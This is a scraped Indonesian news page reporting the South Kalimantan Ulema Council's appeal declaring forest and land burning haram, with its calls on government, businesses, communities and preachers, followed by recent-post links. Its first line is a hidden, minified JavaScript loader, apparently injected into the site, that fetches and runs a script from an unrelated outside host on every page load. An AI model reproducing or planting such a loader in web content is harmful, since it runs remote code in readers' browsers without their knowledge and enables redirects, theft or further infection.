(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

Seruan MUI Kalsel: Fatwa Haram Pembakaran Hutan


KANALKALIMANTAN.COM, BANJARMASIN – Majelis Ulama Indonesia (MUI) Kalimantan Selatan mengeluarkan surat seruan tentang pembakaran hutan dan lahan serta pengendaliannya.

Seruan yang dikeluarkan pada tanggal 17 Juni 2023 tersebut memuat fatwa haram pembakaran hutan berdasarkan keputusan MUI Wilayah IV Kalimantan Nomor 128/MUI-KS/XII/2006 tentang pembakaran hutan dan kabur asap hasil IjtimaUlama Komisi Fatwa tanggal 13 Desember 2006 di Banjarmasin.

Sejumlah poin penting yang disampaikan MUI Kalsel yaitu menyatakan haram membakar hutan dan lahan yang dapat menimbulkan kerusakan, pencemaran lingkungan, kerugian orang lain, gangguan kesehatan, dan dampak buruk lainnya.

Baca juga: Sentra Kerajinan Desa Pulantani Wakili HSU Lomba UP2K Tingkat Kalsel

Kemudian memfasilitasi, membiarkan atau mengambil keuntungan dari pembakaran hutan lahan juga disebutkan sebagai tindakan yang haram.

“Pengengdalian kebakaran hutan dan lahan sebagaimana ketentuan umum, hukumnya wajib,” tulis seruan yang ditandatangani Ketua Umum MUI Kalsel KH Husin Naparin Lc MA.

Kemudian dijelaskan syarat-syarat pemanfaatan hutan dan lahan, diantaranya memperoleh hak yang sah, mendapatkan izin dari pihak berwenang, ditunjukkan untuk kemaslahatan, dan tidak menimbulkan dampak buruk termasuk pencemaran lingkungan.

“Pemanfaatan yang tidak sesuai dengan syarat-syarat sebagaimana dimaksud, hukumnya haram,” katanya.

Baca juga: Diduga Berkelahi, M Tewas Terkapar di Depan Kantor Kelurahan Murung Raya

Selanjutnya seruan juga ditunjukan kepada pemerintah untuk melakukan harmonisasi regulasi serta melakukan sosialisasi peraturan perundang-undangan terkait pemanfaatan hutan dan lahan.

Selain itu, pemerintah juga diminta memberikan edukasi, pemberdayaan masyarakat, membuat kebijakan yang adil, melakukan pengendalian kebakaran, serta menegakan hukum yang tegas dan adil.

Lalu para pelaku usaha diminta mentaati regulasi, melakukan pemberdayaan masyarakat, menjamin kelestarian lingkungan, menyediakan SDM dan sarana pengendali kebakaran hutan, dan mengupayakan teknologi pembukaan lahan yang ramah lingkungan.

Lalu masyarakat diminta agar melakukan upaya konstruktif, melakukan pencegahan dan penanggulangan kebakaran hutan dan lahan.

“Masyarakat juga harus berpartisipasi dalam mengawasi dan mencegah praktek pembakaran hutan dan lahan,” imbau MUI Kalsel.

Baca juga: Mengintip Sukses Pokmas Ngudi Raya Kembangkan Program RT Mandiri

Terakhir, para kiyai maupun tuan guru di Kalsel juga diminta untuk menyisipkan kalimat supaya tidak membakar hutan dan lahan sembarangan dalam menyampaikan khutbah.

“Mengimbau dan mengajak para umat dan masyarakat untuk tidak membakar hutan dan lahan sembarangan, mengingat multi dampak bagi aktivitas ibadah, kesehatan dan perekonomian,” tutup surat seruan tersebut. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

37 menit ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

54 menit ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

14 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

15 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

15 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

15 jam ago

This website uses cookies.